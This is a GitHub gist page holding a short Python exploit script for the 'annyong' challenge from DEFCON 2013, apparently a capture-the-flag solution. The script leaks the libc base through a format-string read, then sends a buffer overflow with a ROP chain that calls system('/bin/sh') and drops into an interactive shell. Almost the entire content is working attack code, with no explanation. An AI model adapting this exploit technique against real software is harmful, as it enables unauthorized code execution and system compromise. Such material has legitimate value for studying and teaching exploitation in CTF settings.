Last active
October 1, 2015 08:04
-
-
Save 193s/032b7a8eec5cfdf3cef0 to your computer and use it in GitHub Desktop.
DEFCON 2013 annyong
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from ebil import * | |
from libformatstr import FormatStr | |
exec ebil('./annyong', arch='x86_64') | |
if LOCAL: libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') | |
if REMOTE: libc = ELF('./libc.so.6') | |
def echo(buf, ret=True): | |
assert not '\x0a' in buf | |
sendline(buf, 0x900) | |
if ret: | |
res = r.recvuntil('\n', drop=True) | |
print hexdump(res) | |
return res | |
#== leak ===================== | |
libc_base = int(echo('%104$lx'), 16) - 0x0001653c # LOCAL only | |
log.success('libc_base = ' + hex(libc_base)) | |
#== bof ====================== | |
def libc_str(buf, n=0): | |
it = libc.search(buf) | |
for _ in xrange(n): next(it) | |
return libc_base + next(it) | |
def libc_a(a, n=0): | |
return libc_str(asm(a, arch='x86_64'), n=n) | |
gad_ret = libc_a('ret') | |
payload = p(gad_ret)*((0x900-0x20)/8) | |
payload += chain([ | |
libc_a('pop rdi; ret', n=1), libc_str('/bin/sh\0'), | |
libc_base + libc.symbols['system'], | |
]) | |
echo(payload, ret=False) | |
interact() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment